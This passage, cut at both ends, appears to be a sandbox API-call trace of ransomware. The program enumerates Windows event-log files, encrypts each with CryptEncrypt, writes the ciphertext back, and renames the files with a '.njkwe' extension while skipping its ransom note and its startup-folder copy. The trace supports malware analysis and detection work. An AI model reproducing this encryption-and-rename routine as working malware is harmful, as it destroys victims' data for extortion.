(lpString1="HardwareEvents.evtx", lpString2="Program Files") returned -1 [0065.694] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="Program Files (x86)") returned -1 [0065.694] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\HardwareEvents.evtx") returned 31 [0065.694] StrStrIW (lpFirst="HardwareEvents.evtx", lpSrch=".njkwe") returned 0x0 [0065.694] lstrcmpW (lpString1="HardwareEvents.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.694] lstrcmpW (lpString1="HardwareEvents.evtx", lpString2="taridd") returned -1 [0065.694] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\HardwareEvents.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.694] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.694] GetTickCount () returned 0x1150d2b [0065.695] GetTickCount () returned 0x1150d2b [0065.695] GetTickCount () returned 0x1150d2b [0065.695] GetTickCount () returned 0x1150d2b [0065.695] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.695] GetProcessHeap () returned 0xbe0000 [0065.695] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.695] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.697] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.697] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.697] GetProcessHeap () returned 0xbe0000 [0065.697] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.697] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.697] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.698] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.698] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.698] CloseHandle (hObject=0x428) returned 1 [0065.700] GetProcessHeap () returned 0xbe0000 [0065.700] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.700] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\HardwareEvents.evtx_r00t_{3sXlE5}.njkwe") returned 51 [0065.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\hardwareevents.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.700] GetProcessHeap () returned 0xbe0000 [0065.700] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.700] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0065.700] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="Windows") returned -1 [0065.700] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="$Recycle.bin") returned 1 [0065.700] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="System Volume Information") returned -1 [0065.700] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="Program Files") returned -1 [0065.700] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="Program Files (x86)") returned -1 [0065.700] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Internet Explorer.evtx") returned 34 [0065.700] StrStrIW (lpFirst="Internet Explorer.evtx", lpSrch=".njkwe") returned 0x0 [0065.700] lstrcmpW (lpString1="Internet Explorer.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.700] lstrcmpW (lpString1="Internet Explorer.evtx", lpString2="taridd") returned -1 [0065.701] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Internet Explorer.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.701] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.701] GetTickCount () returned 0x1150d3b [0065.701] GetTickCount () returned 0x1150d3b [0065.701] GetTickCount () returned 0x1150d3b [0065.701] GetTickCount () returned 0x1150d3b [0065.701] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.701] GetProcessHeap () returned 0xbe0000 [0065.701] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.701] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.703] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.703] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.703] GetProcessHeap () returned 0xbe0000 [0065.703] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.703] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.703] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.703] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.703] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.703] CloseHandle (hObject=0x428) returned 1 [0065.705] GetProcessHeap () returned 0xbe0000 [0065.705] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.705] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Internet Explorer.evtx_r00t_{3sXlE5}.njkwe") returned 54 [0065.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\internet explorer.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.706] GetProcessHeap () returned 0xbe0000 [0065.706] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.706] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0065.706] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="Windows") returned -1 [0065.706] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="$Recycle.bin") returned 1 [0065.706] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="System Volume Information") returned -1 [0065.706] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="Program Files") returned -1 [0065.706] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="Program Files (x86)") returned -1 [0065.706] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Key Management Service.evtx") returned 39 [0065.706] StrStrIW (lpFirst="Key Management Service.evtx", lpSrch=".njkwe") returned 0x0 [0065.706] lstrcmpW (lpString1="Key Management Service.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.706] lstrcmpW (lpString1="Key Management Service.evtx", lpString2="taridd") returned -1 [0065.706] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Key Management Service.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.706] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.706] GetTickCount () returned 0x1150d3b [0065.706] GetTickCount () returned 0x1150d3b [0065.706] GetTickCount () returned 0x1150d3b [0065.706] GetTickCount () returned 0x1150d3b [0065.707] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.707] GetProcessHeap () returned 0xbe0000 [0065.707] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.707] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.708] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.709] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.709] GetProcessHeap () returned 0xbe0000 [0065.709] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.709] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.709] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.709] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.709] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.709] CloseHandle (hObject=0x428) returned 1 [0065.711] GetProcessHeap () returned 0xbe0000 [0065.711] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.711] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Key Management Service.evtx_r00t_{3sXlE5}.njkwe") returned 59 [0065.711] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\key management service.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.723] GetProcessHeap () returned 0xbe0000 [0065.723] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.723] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0065.723] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="Windows") returned -1 [0065.723] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0065.723] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="System Volume Information") returned -1 [0065.723] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="Program Files") returned -1 [0065.723] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0065.724] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 59 [0065.724] StrStrIW (lpFirst="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0065.724] lstrcmpW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.724] lstrcmpW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="taridd") returned -1 [0065.724] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.724] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.724] GetTickCount () returned 0x1150d4b [0065.724] GetTickCount () returned 0x1150d4b [0065.724] GetTickCount () returned 0x1150d4b [0065.724] GetTickCount () returned 0x1150d4b [0065.724] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.724] GetProcessHeap () returned 0xbe0000 [0065.724] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.724] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.726] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.726] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.726] GetProcessHeap () returned 0xbe0000 [0065.726] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.726] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.726] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.726] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.726] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.727] CloseHandle (hObject=0x428) returned 1 [0065.728] GetProcessHeap () returned 0xbe0000 [0065.729] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.729] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 79 [0065.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.729] GetProcessHeap () returned 0xbe0000 [0065.729] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.729] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0065.729] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="Windows") returned -1 [0065.729] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="$Recycle.bin") returned 1 [0065.729] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="System Volume Information") returned -1 [0065.729] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="Program Files") returned -1 [0065.729] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="Program Files (x86)") returned -1 [0065.729] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 90 [0065.729] StrStrIW (lpFirst="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpSrch=".njkwe") returned 0x0 [0065.729] lstrcmpW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.729] lstrcmpW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="taridd") returned -1 [0065.729] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.729] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.730] GetTickCount () returned 0x1150d5a [0065.730] GetTickCount () returned 0x1150d5a [0065.730] GetTickCount () returned 0x1150d5a [0065.730] GetTickCount () returned 0x1150d5a [0065.730] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.730] GetProcessHeap () returned 0xbe0000 [0065.730] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.730] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.741] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.741] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.741] GetProcessHeap () returned 0xbe0000 [0065.741] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.741] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.741] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.741] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.741] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.741] CloseHandle (hObject=0x428) returned 1 [0065.744] GetProcessHeap () returned 0xbe0000 [0065.744] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.744] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx_r00t_{3sXlE5}.njkwe") returned 110 [0065.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.745] GetProcessHeap () returned 